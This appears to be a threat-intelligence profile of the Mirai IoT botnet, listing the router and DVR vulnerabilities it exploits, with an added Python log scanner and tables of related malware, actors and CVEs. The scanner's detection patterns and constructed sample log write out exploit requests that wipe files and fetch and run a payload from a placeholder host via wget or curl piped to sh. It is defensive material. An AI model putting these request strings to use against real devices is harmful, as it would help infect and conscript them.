Mirai Botnet

Malware Profile Updated 12 days ago
Mirai is a Linux malware family that conscripts Internet of Things (IoT) and other embedded devices into botnets, networks of infected devices controlled as a group and used mainly for large-scale distributed denial-of-service (DDoS) attacks. It spreads by scanning for exposed devices and exploiting known vulnerabilities in them, and since its source code became public it has been forked into many variants. In Q1 2022, detections of the Mirai botnet family in Hong Kong dropped by 9% quarter-over-quarter, but the decline does not signal an end to the threat: the family keeps adding new propagation vectors. One campaign used three old vulnerabilities for propagation: CVE-2016-20016 (remote code execution in the JAWS web server on MVPower CCTV DVRs), CVE-2018-10561/10562 (authentication bypass and command injection in Dasan GPON home routers) and CVE-2017-17215 (remote code execution in Huawei HG532 routers). More recently, researchers from Juniper Threat Labs reported threat actors chaining the newly disclosed Ivanti Connect Secure (ICS) vulnerabilities CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to drop Mirai payloads. These developments underscore the persistent danger posed by the Mirai family; keeping internet-facing devices patched and off default credentials, and watching web logs for exploit attempts against the CVEs above, remain the practical defenses.
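As an added example (not code from this page, from Juniper, or from any vendor), the following Python log scanner flags requests that match the exploit paths associated with the CVEs named above, plus the generic fetch-and-run stager that Mirai droppers carry in the injected command. The log lines are constructed; the URI fragments come from public exploit reporting on each CVE and are assumptions to verify against your own telemetry. CVE-2018-10562 and CVE-2024-21887 are command injections carried in the request body or in the suffix of the traversal path, so only the request path is matched here.

```python
"""Flag web-server requests that match the propagation exploits Mirai
variants use.  Added example: not code from the page or from any vendor."""
import re
from urllib.parse import unquote_plus

# Request-path signatures for the CVEs named on the page.  The URI fragments
# are taken from public exploit reporting for each CVE and are ASSUMED to be
# correct for your environment; tune them against your own telemetry.
SIGNATURES = {
    # MVPower CCTV DVR: the JAWS web server's "shell" endpoint runs the query
    "CVE-2016-20016": re.compile(r"^/shell\?", re.I),
    # Dasan GPON routers: auth bypass (10561), injection in the POST body (10562)
    "CVE-2018-10561/10562": re.compile(r"^/GponForm/diag_Form", re.I),
    # Huawei HG532: UPnP firmware-upgrade handler, injection is in the SOAP body
    "CVE-2017-17215": re.compile(r"^/ctrlt/DeviceUpgrade_1", re.I),
    # TP-Link Archer AX21: unauthenticated locale endpoint, injection in 'country'
    "CVE-2023-1389": re.compile(r"^/cgi-bin/luci/;stok=/locale", re.I),
    # Ivanti Connect Secure: traversal through the TOTP endpoint bypasses auth
    # (46805) and reaches a command-injection sink (21887) in the same request
    "CVE-2023-46805+CVE-2024-21887": re.compile(
        r"^/api/v1/totp/user-backup-code/\.\./\.\./", re.I),
}

# Generic Mirai-style stager: a download tool followed by a URL to fetch.
STAGER = re.compile(r"\b(wget|curl|tftp)\b.*?(?:https?|tftp)://", re.I)

# Common/combined log format: ip ident user [time] "METHOD uri proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)

# Constructed sample log (hosts and payload URLs are documentation-range placeholders).
SAMPLE_LOG = """\
203.0.113.10 - - [15/Jan/2024:10:01:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://198.51.100.7/jaws;sh+/tmp/jaws HTTP/1.1" 404 0
203.0.113.11 - - [15/Jan/2024:10:01:05 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 512
203.0.113.12 - - [15/Jan/2024:10:01:09 +0000] "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" 404 0
203.0.113.13 - - [15/Jan/2024:10:02:00 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/;curl%20http://198.51.100.7/mirai.sh|sh HTTP/1.1" 403 0
198.51.100.5 - - [15/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def parse_line(line):
    """Return (ip, method, decoded_uri, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %xx and '+' so URL-encoded commands still hit the patterns.
    return m["ip"], m["method"], unquote_plus(m["uri"]), int(m["status"])


def classify(uri):
    """Return the CVE label whose exploit path the URI matches, or None."""
    for cve, pattern in SIGNATURES.items():
        if pattern.search(uri):
            return cve
    return None


def scan(log_text):
    """One finding per request that hits a CVE path or carries a stager."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, method, uri, status = parsed
        cve = classify(uri)
        stager = STAGER.search(uri) is not None
        if cve or stager:
            findings.append({"src": ip, "method": method, "cve": cve,
                             "stager": stager, "status": status, "uri": uri})
    return findings


def sources(findings):
    """Map each source IP to the set of CVE labels it probed (for blocking)."""
    out = {}
    for f in findings:
        out.setdefault(f["src"], set())
        if f["cve"]:
            out[f["src"]].add(f["cve"])
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        label = f["cve"] or "-"
        print(f"{f['src']:15} {f['status']} {label:30} stager={f['stager']} {f['uri'][:60]}")
```

A 404 or 403 on one of these paths still means an infected peer is scanning you and the source is worth blocking; a 200 on a device you own warrants pulling the device for triage, since the same request usually carries the fetch-and-run stager. Extend `SIGNATURES` as the vulnerability list on this page grows; vulnerabilities exploited over non-HTTP services (the page's Zyxel CVE-2023-28771 is reached over IKE) need a different data source.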
Possible Aliases / Cluster overlaps
It is hard to track cluster overlaps and naming conventions between vendors, so here are some possibly overlapping names / profiles you may also want to look at.
ID | Votes | Profile Description
Gafgyt | 3 | Gafgyt, also known as Bashlite, is a form of malware that infects Linux architecture operating systems to launch Distributed Denial of Service (DDoS) attacks. The malware infiltrates systems through suspicious downloads, emails, or websites, and once inside, it can steal personal information, disrup
Gafgyt Variant | 2 | The Gafgyt variant is a malicious software that poses a significant threat to computer systems and devices. This malware can infiltrate your system through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it has the potential to steal personal information,
Moobot | 2 | Moobot is a malicious software (malware) that has been causing significant disruption in the digital world. The malware, which can infiltrate systems through various methods such as suspicious downloads, emails, or websites, is known for its capability to steal personal information, disrupt operatio
Miori | 1 | Miori is a variant of the notorious Mirai malware, which shares similar modules with it. Like other types of malware, Miori is designed to exploit and damage computer systems, often infiltrating them through suspicious downloads, emails, or websites. Once it has infected a system, it can steal perso
Agoent | 1 | AGoent is a sophisticated malware, a malicious software designed to exploit and damage computer systems. This Golang-based agent bot has been observed in multiple attacks, exploiting a year-old vulnerability to launch various nefarious activities. It operates by fetching the script file "exec.sh" fr
skid.x86 | 1 | None
Miscellaneous Associations
Other contextual terms that may help judge relevance
Botnet
Malware
Vulnerability
Ddos
Linux
Exploit
Zero Day
Akamai
Minecraft
Ransomware
Android
t1583.005
Fortiguard
DNS
Hackread
Retail
CISA
Phishing
SSH
Exploits
Apache
Azure
Esxi
Bitcoin
Aws
Ics
Chrome
Vpn
Wordpress
Zyxel
Malwarebytes
Ivanti
Tp
Fortinet
Ddos Botnet
Worm
Wiper
Trojan
Backdoor
Payload
Bot
Denial of Se...
Fbi
Associated Malware
ID | Type | Votes | Profile Description
Mirai | Unspecified | 13 | Mirai is a type of malware that primarily targets Internet of Things (IoT) devices to form botnets, which are networks of private computers infected with malicious software and controlled as a group without the owners' knowledge. In early 2022, Mirai botnets accounted for over 7 million detections g
Kinsing | Unspecified | 1 | Kinsing is a type of malware, short for malicious software, that is designed to exploit and damage computer systems or devices. It typically infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt o
Mozi Botnet | Unspecified | 1 | The Mozi botnet, a form of malware, wreaked havoc on the internet from 2019 to 2023. During this period, it became the largest botnet in existence, incorporating over 1.5 million unique devices into its network. The botnet primarily exploited known vulnerabilities in NETGEAR DGN devices and JAWS web
Mozi | Unspecified | 1 | Mozi is a type of malware, a malicious software designed to exploit and damage computer systems or devices. It can infiltrate systems via suspicious downloads, emails, or websites, often unbeknownst to the user. Once it gains access, Mozi has the potential to steal personal information, disrupt oper
PLEAD | Unspecified | 1 | The PLEAD malware is a malicious software that was discovered by ESET researchers in 2019 to be utilized by the Chinese APT group known as BlackTech. The group was found to be performing Man-in-the-Middle (MitM) attacks through compromised ASUS routers and delivering the PLEAD malware through ASUS W
Noabot | Unspecified | 1 | NoaBot is a sophisticated malware variant that primarily targets Linux systems, utilizing a cryptominer to exploit system resources. It is based on the Mirai botnet, a notorious malware strain known for its ability to compromise Internet of Things (IoT) devices. NoaBot has most of the capabilities o
WannaCry | Unspecified | 1 | WannaCry is a type of malware, specifically ransomware, that caused significant global disruption in 2017. It exploited Windows SMBv1 Remote Code Execution Vulnerabilities (CVE-2017-0144, CVE-2017-0145, CVE-2017-0143), which allowed it to spread rapidly and infect over 200,000 machines across more t
Lockbit | Unspecified | 1 | LockBit is a type of malware, specifically ransomware, that infiltrates systems to exploit and damage them. It can enter your system through various channels such as suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt
Tunnelvision | Unspecified | 1 | TunnelVision is a potent malware that has been making headlines for its ability to bypass VPN encapsulation. This malicious software, designed to exploit and damage computer systems, infiltrates through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside a syst
Kiraibot | Unspecified | 1 | KiraiBot is a recent and active malware, identified as part of the Mirai botnet variant family in September 2023 by NSFOCUS's global threat hunting system. It is one of several new botnet variants developed based on the Mirai source code, alongside hailBot and catDDoS. However, kiraiBot is unique in
Catddos | Unspecified | 1 | CatDDoS, a variant of the Mirai distributed denial-of-service (DDoS) botnet, is a potent malware threat that has been compromising more than 300 targets daily in its latest wave of attacks. The malware infects systems through suspicious downloads, emails, or websites and can disrupt operations, stea
Condi | Unspecified | 1 | Condi is a relatively new botnet, a type of malware, that has been exploiting unpatched TP-Link routers to spread and execute malicious activities. Identified by FortiGuard Labs, the Condi botnet leverages the vulnerability CVE-2023-1389 to gain control of devices. It was first advertised through a
Jenx Mirai | Unspecified | 1 | JenX Mirai is a variant of malware, malicious software designed to exploit and damage computer systems. This particular variant was discovered in January 2018 and has been used primarily by the InfectedSlurs botnet, an unidentified group that uses offensive language in its command-and-control (C2) d
Infectedslurs | Unspecified | 1 | InfectedSlurs is a newly discovered malware that operates as a Mirai-based botnet. This malicious software is designed to exploit and damage computer systems and devices, often infiltrating the system through suspicious downloads, emails, or websites without the user's knowledge. Once inside, it can
Associated Threat Actors
ID | Type | Votes | Profile Description
Medusa | Unspecified | 1 | Medusa, a threat actor group, has been identified as a rising menace in the cybersecurity landscape, with its ransomware activities escalating significantly. In November 2023, Medusa and other groups like LockBit and ALPHV (BlackCat) exploited a zero-day vulnerability known as Citrix Bleed (CVE-2023
Sandworm | Unspecified | 1 | Sandworm, a threat actor linked to Russia, has been implicated in numerous high-profile cyber attacks. This group's activities have primarily targeted Ukraine, compromising the country's critical infrastructure and telecommunications providers. The Sandworm group is known for its fileless attack met
APT28 | Unspecified | 1 | APT28, also known as Fancy Bear, is a threat actor linked to Russia and has been involved in numerous cyber espionage campaigns. The group is notorious for its sophisticated tactics, techniques, and procedures (TTPs). Recently, NATO and the EU formally condemned APT28's activities, acknowledging the
Unc5221 | Unspecified | 1 | UNC5221, a threat actor linked to China, has been identified as the group behind recent cyberattacks involving new malware specifically designed to exploit vulnerabilities in Ivanti Connect Secure VPN and Policy Secure devices. The discovery was made by Mandiant researchers who observed the deployme
Associated Vulnerabilities
ID | Type | Votes | Profile Description
CVE-2023-1389 | Unspecified | 6 | CVE-2023-1389 is a significant software vulnerability, specifically a command injection flaw, found in TP-Link Archer AX21 routers. The flaw was publicly released in March of this year and has since been exploited by malicious actors to gain unauthorized access to devices. Attack traffic through the
CVE-2023-28771 | Unspecified | 1 | CVE-2023-28771 is a software vulnerability, specifically a command injection flaw, in Zyxel ZyWALL firewalls. The vulnerability was detected by FortiGuard Labs in June 2023 when it was being exploited by several Distributed Denial of Service (DDoS) botnets. It's worth noting that this vulnerability
CVE-2023-26801 | Unspecified | 1 | None
CVE-2023-46805 | Unspecified | 1 | CVE-2023-46805 is a significant software vulnerability discovered in the web component of all supported versions of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x). This flaw, which allows for authentication bypass, was first brought to the attention of the Cyber Centre on Jan
CVE-2024-21887 | Unspecified | 1 | CVE-2024-21887 is a command injection vulnerability identified in the web components of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x). This flaw was publicly disclosed on January 10, 2024, alongside an authentication bypass vulnerability (CVE-2023-46805), affecting the same
CVE-2016-20016 | Unspecified | 1 | CVE-2016-20016 is a significant software vulnerability identified in MVPower CCTV DVR systems. This flaw, known as a remote code execution vulnerability, allows unauthorized users to execute arbitrary code on the system remotely, potentially leading to full system compromise. The vulnerability, also
CVE-2018-10561 | Unspecified | 1 | None
CVE-2017-17215 | Unspecified | 1 | CVE-2017-17215 is a significant vulnerability found in Huawei HG532 routers, characterized as a flaw in software design or implementation. This vulnerability has been exploited to distribute malware through exposed Hadoop YARN servers and security flaws in Realtek SDK devices (CVE-2014-8361) and Hua
CVE-2023-49606 | Unspecified | 1 | None
CVE-2024-3273 | Unspecified | 1 | None
CVE-2022-29303 | Unspecified | 1 | None
Source Document References
Information about the Mirai Botnet malware was read from the document corpus below. This display is limited to 20 results.
Source | Created | Title
Securityaffairs | 6 days ago | Security Affairs Malware Newsletter - Round 3
Securityaffairs | 12 days ago | Security Affairs Malware Newsletter - Round 2
Securityaffairs | 20 days ago | Security Affairs Malware Newsletter - Round 1
Securityaffairs | a month ago | Security Affairs newsletter Round 478 by Pierluigi Paganini – INTERNATIONAL EDITION
InfoSecurity-magazine | a month ago | Cyber Attackers Turn to Cloud Services to Deploy Malware
Securityaffairs | a month ago | Security Affairs newsletter Round 477 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs | a month ago | Security Affairs newsletter Round 476 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs | 2 months ago | Security Affairs newsletter Round 473 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs | 2 months ago | Security Affairs newsletter Round 471 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs | 3 months ago | Mirai botnet also spreads through the exploitation of Ivanti Connect Secure bugs
CERT-EU | 10 months ago | Where Linux is in your home, and how to protect Linux devices from hacking
CERT-EU | 10 months ago | Are your smart lightbulbs spying on you? - Panda Security
CERT-EU | a year ago | SYN Flood Explained. How to Prevent this Attack from Taking over your Server
CERT-EU | a year ago | Samsung Phone Flaws Added to CISA ‘Must Patch’ List Likely Exploited by Spyware Vendor
CERT-EU | a year ago | AndoryuBot DDoS Botnet Exploiting Ruckus AP Vulnerability
DARKReading | a year ago | Mirai Common Attack Methods Remain Consistent, Effective
Malwarebytes | a year ago | Port scan attacks: Protecting your business from RDP attacks and Mirai botnets
CERT-EU | a year ago | History of Computer Hacking and Cybersecurity Threats: From the 50s to Today | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #ransomware – National Cyber Security Consulting
Unit42 | a year ago | IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits